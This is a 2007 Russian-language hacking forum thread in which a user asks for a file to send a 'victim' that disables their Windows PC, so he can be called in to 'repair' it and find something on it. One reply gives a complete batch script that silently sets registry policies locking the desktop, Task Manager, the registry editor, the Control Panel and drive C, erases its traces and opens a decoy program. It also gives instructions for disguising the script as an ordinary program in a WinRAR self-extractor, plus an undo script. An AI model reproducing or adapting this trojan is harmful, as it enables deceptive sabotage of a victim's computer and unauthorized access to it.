Отключить комп до моего прихода

Discussion in 'Безопасность и Анонимность' started by Debian, 14 Dec 2007.

  1. Debian

    Debian New Member

    Joined:
    29 Aug 2007
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Уважаемые мастера, задача такова:

    Есть компьютер с Win толи Home толи XP , нужно спомощью файла ( мб bat ) котрый я передам на компьютер жертвы, временно устранить работу компьютера, т.е. Я кидаю файл, человек его открыват, дальше сидит делает свои дела, на ночь выключает, утром включат а он у него не пашет... :D , потом он звонит мне и просит приехать в общем нужно чтобы компьютер до моего приезда невозможно было включить...что то вроде погружения в автозагрузку .... и желательно узнать бы как привести его птом в рабочее состояние) :cool:

    Кто нибудь может что нибудь подсказать?
     
  2. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    сменить пасс админский через смd-файл
    Code:
    NET USER
    [имя_пользователя [пароль | *] [параметры]] [/DOMAIN]
             имя_пользователя {пароль | *} /ADD [параметры] [/DOMAIN]
             имя_пользователя [/DELETE] [/DOMAIN]
    
     
  3. Debian

    Debian New Member

    Joined:
    29 Aug 2007
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    не не...Вы не поняли, Мне нужно чтобы он был как вирус, кинул его жертве, она запустила...а комп врубить не может , но чтобы без повреждений )
     
    #3 Debian, 14 Dec 2007
    Last edited by a moderator: 14 Dec 2007
  4. ToniKapuchon

    ToniKapuchon Elder - Старейшина

    Joined:
    26 Feb 2006
    Messages:
    153
    Likes Received:
    45
    Reputations:
    -1
    Пока тока идея.... если буд время напишу... В автозагрузку кидается exeшник... который выкидывает мессагбох типа отсутствуют системные файлы.... и через 30 сек перезагрузка винды... и так по кругу.... потом коммандером заходишь exe c автозагрузки удаляешь и вуаля всё работает....
     
  5. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Желаю долгих и счаливых приходов. =)))
     
    1 person likes this.
  6. ArmageddonPro

    ArmageddonPro Elder - Старейшина

    Joined:
    11 May 2006
    Messages:
    272
    Likes Received:
    42
    Reputations:
    4
    Если компьютер будет врубаься, но после перезагрузки на рабочем столе ничего нельзя будет сделать и не будет пункта "программы" в пуске . Такое устроит?
     
  7. Debian

    Debian New Member

    Joined:
    29 Aug 2007
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0

    а как это можно будет потом исправить?=) просто я получу доступ к компу для того чтобы как раз восстановить его :D , и в итоге найду то что нужно)
     
  8. Debian

    Debian New Member

    Joined:
    29 Aug 2007
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0

    Будем ждать с нетерпением))
     
  9. ArmageddonPro

    ArmageddonPro Elder - Старейшина

    Joined:
    11 May 2006
    Messages:
    272
    Likes Received:
    42
    Reputations:
    4
    Я дам тебе "таблетку". Так устроит?
     
  10. Debian

    Debian New Member

    Joined:
    29 Aug 2007
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0

    вполне))
     
  11. ArmageddonPro

    ArmageddonPro Elder - Старейшина

    Joined:
    11 May 2006
    Messages:
    272
    Likes Received:
    42
    Reputations:
    4
    Завтра приготовлю. Дело в том, что мне тоже нужно такое, потому жди ответа в форуме.
    Работать будет в ХР и ниже, проблемы могут возникнуть с 7м каспером.
     
  12. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    приходы это да. Ты витамины для программистов кушай почаще.
     
  13. Debian

    Debian New Member

    Joined:
    29 Aug 2007
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Хорошо) Там не каспер стоит)
     
  14. Debian

    Debian New Member

    Joined:
    29 Aug 2007
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    такой вот вопрос , реально ли зделать батовский файл который погрузица в автозагрузку , и будет при включении компа выписывать в командной строке shutdown -s ? т.е. отключение питания..)
     
  15. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    реально.
     
  16. Debian

    Debian New Member

    Joined:
    29 Aug 2007
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    м..а каков этот код?) если конечно не трудно подсказать)
     
  17. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    создаешь поменщаеш в автозагрузку.
     
  18. Debian

    Debian New Member

    Joined:
    29 Aug 2007
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    ты не понял, нужно чтобы при запуске он автоматически сам туда погрузился)
     
  19. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    Фильмов насмотрелся =\

    а что тебе мешает нагнуться и вкл кнопку? =\
     
  20. ArmageddonPro

    ArmageddonPro Elder - Старейшина

    Joined:
    11 May 2006
    Messages:
    272
    Likes Received:
    42
    Reputations:
    4
    Итак! Как и обещал выкладываю свою реализацию.
    Итак! Как и обещал, выкладываю свою реализацию.
    Теория.
    Какой должна быть наша программа?
    1. Лёгкое и доступное написание;
    2. Должна усложнять работу жертвы до прихода заказчика;
    3. Не должна вызывать подозрений;
    4. Должна запускаться как обычное приложение (двумя кликами грызуна);
    5. Лёгкое обезвреживание.

    ---1---
    Запускаться по клику мышки могут 4 типа фалов: *.exe, *.com, *.scr, *.bat. Из всех приведённых форматов только *.bat позволяет не прибегать к установке сторонних приложений для своего создания, обычного блокнота будет достаточно! Кроме того *.bat файлы позволяют создавать текстовые файлы с любыми разрешениями. Мы знаем, что файлы реестра имеют текстовый формат. Делаем вывод: *.bat способен создавать файлы реестра Windows. Но это ещё не всё! Bat позволяет запускать *.reg-файлы и без вопросов добавлять их информацию в реестр. Этим собственно и займёмся. Имя нашего батника будет reestr.bat.
    Допустим нам нужно создать файл reestr.reg с данными Windows Registry Editor Version 5.00 и записать его в корневой каталог диска C:\, тогда наш reestr.bat будет содержать такую строку: echo Windows Registry Editor Version 5.00 > C:\reestr.reg. Для добавления последующих строк будем использовать вместо > знак >>. Таким образом, мы создаём необходимый код для добавления в реестр.
    ---2---
    Некоторые параметры реестра отвечают за работу интерфейса ОС, их мы и будем рассматривать.
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
    DWORD DisableTaskMgr, значение 1 - запрещает вызов диспетчера задач
    DWORD DisableRegistryTools, значение 1 - запрещает вызов редактора реестра
    DWORD NoDispBackgroundPage, значение 1 - скрыть вкладку

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
    DWORD NoControlPanel, значение 1 - запрещает запуск апплетов в Панели управления
    DWORD NoViewOnDrive, значение сумма "значений дисков". Значение 0 - разрешен доступ ко всем дискам, значение 67108863 (hex:3ffffff) - запретить доступ ко всем дискам (A: - Z:)
    Значения дисков:
    A: - 1 (2^0)
    B: - 2 (2^1)
    C: - 4 (2^2)
    D: - 8 (2^3)
    ...
    Z:- 33554432 (2^25)

    Чтобы запретить доступ к дискам A и D необходимо сложить 1 + 8 = 9.
    DWORD NoSetTaskbar, значение 1 - свойства Панели задачи меню Пуск не доступны
    DWORD NoChangeStartMenu, значение 1 - запрещает модификацию меню Пуск
    DWORD NoStartMenuMorePrograms, значение 1 - убирает подменю Все программы
    DWORD NoRecentDocsMenu, значение 1 - убирает пункт меню Недавние документы
    DWORD NoTrayContextMenu, значение 1 - запрещает контекстное меню.
    DWORD NoDesktop, значение 1 - запрещает рабочий стол
    ---3---
    Создать файл реестра с данными параметрами, ещё полдела, нужно, чтобы он незаметно добавился. Поэтому пишем regedit /S C:\reestr.reg, где /S - добавляет данные в реестр без лишних вопросов.
    Заметаем следы del C:\reestr.reg.
    ---4---
    Итак, данные мы добавили, следы замели. Остаётся сделать наше творение обычным приложением, то есть перевести её в *.exe формат и заставить, что-то запускать, кроме того, она должна иметь иконку, а как же иначе?
    Делается это всё очень просто: во-первых, нам нужно выполнять какую-то программу из-под нашего батника, тогда пишем путь к нашей прожке и одновременно запускаем её @start /MAX C:\Progra~1\SmallFish\Beyond.exe. Как вы поняли, исполняемая батником программа будет называться Beyond.exe. Beyond.exe – это любая программа, которую вы хотите запуститься на чужом компе, чтобы показать, что-нибудь пользователю в качестве отвлечения. Не хорошо же предлагать людям нерабочую программу, а с эти Beyond.exe всё будет работать и не вызовет подозрений ;)
    Полный код файла reestr.bat:
    Code:
    @echo off
    echo Windows Registry Editor Version 5.00 > C:\reestr.reg
    echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]   >> C:\reestr.reg
    echo "NoSetTaskbar"=dword:00000001   >> C:\reestr.reg
    echo "NoDesktop"=dword:00000001   >> C:\reestr.reg
    echo "NoChangeStartMenu"=dword:00000001  >> C:\reestr.reg
    echo "NoStartMenuMorePrograms"=dword:00000001  >> C:\reestr.reg
    echo "NoRecentDocsMenu"=dword:00000001  >> C:\reestr.reg
    echo "NoSetFolders"=dword:00000001  >> C:\reestr.reg
    echo "NoTrayContextMenu"=dword:00000001  >> C:\reestr.reg
    echo "NoControlPanel"=dword:00000001  >> C:\reestr.reg
    echo "NoDrives"=dword:00000004  >> C:\reestr.reg
    echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]  >> C:\reestr.reg
    echo "NoDispBackgroundPage"=dword:00000001  >> C:\reestr.reg
    echo "DisableTaskMgr"=dword:00000001  >> C:\reestr.reg
    echo "DisableRegistryTools"=dword:00000001  >> C:\reestr.reg
    regedit /s C:\reestr.reg
    del C:\reestr.reg
    @start /MAX C:\ Progra~1\SmallFish\Beyond.exe
    EXIT
    Сейчас вы зададите вопрос: а откуда же возьмётся Beyond.exe да ещё и в несуществующей папке C:\ Progra~1\SmallFish\Beyond.exe? А вот тут уже нам понадобится обычный архиватор WinRAR!
    Берём два файла: а) наш, готовый батник; б) Программу-заставку - Beyond.exe.
    Далее создаём SFX-архив.
    [​IMG] [/IMG]
    Во вкладке «Дополнительно» выбираем «параметры SFX»
    [​IMG]
    Cтавим абсолютный путь для распаковки C:\Progra~1\SmallFishes/ . Устанавливаем галку «сохранять и восстанавливать пути». В пункте «выполнить после распаковки:» пишем "C:\Progra~1\SmallFishes\reestr.bat"
    [​IMG]
    Далее лезем во вкладку «режимы» и настраиваем как на рисунке
    [​IMG]
    И последний штрих. Нужно назначить иконку. Вкладка «текст и значок» как раз для этих целей.
    [​IMG]

    Собственно программа готова.
    ---5---
    Теперь напишем файл SDN.bat для обезвреживания:
    Code:
    echo Windows Registry Editor Version 5.00 > C:\reestr.reg
    echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]   >> C:\reestr.reg
    echo "NoSetTaskbar"=dword:00000000   >> C:\reestr.reg
    echo "NoDesktop"=dword:00000000   >> C:\reestr.reg
    echo "NoChangeStartMenu"=dword:00000000  >> C:\reestr.reg
    echo "NoStartMenuMorePrograms"=dword:00000000  >> C:\reestr.reg
    echo "NoRecentDocsMenu"=dword:00000000  >> C:\reestr.reg
    echo "NoSetFolders"=dword:00000000  >> C:\reestr.reg
    echo "NoTrayContextMenu"=dword:00000000  >> C:\reestr.reg
    echo "NoControlPanel"=dword:00000000  >> C:\reestr.reg
    echo "NoDrives"=dword:00000000  >> C:\reestr.reg
    echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]  >> C:\reestr.reg
    echo "NoDispBackgroundPage"=dword:00000000  >> C:\reestr.reg
    echo "DisableTaskMgr"=dword:00000000  >> C:\reestr.reg
    echo "DisableRegistryTools"=dword:00000000  >> C:\reestr.reg
    regedit /s C:\reestr.reg
    PS: поскольку очень многое стало закрытым, то для того, чтобы вернуть всё обратно нам понадобится зайти Пуск-->Выполнить, вписать explorer найти и выполнить sdn.bat. После перезагрузки винда будет как новая
    Если кому нужен готовый вариант пишите на мыло armageddon(злая собака)mail.ru
     
    #20 ArmageddonPro, 15 Dec 2007
    Last edited: 15 Dec 2007
    1 person likes this.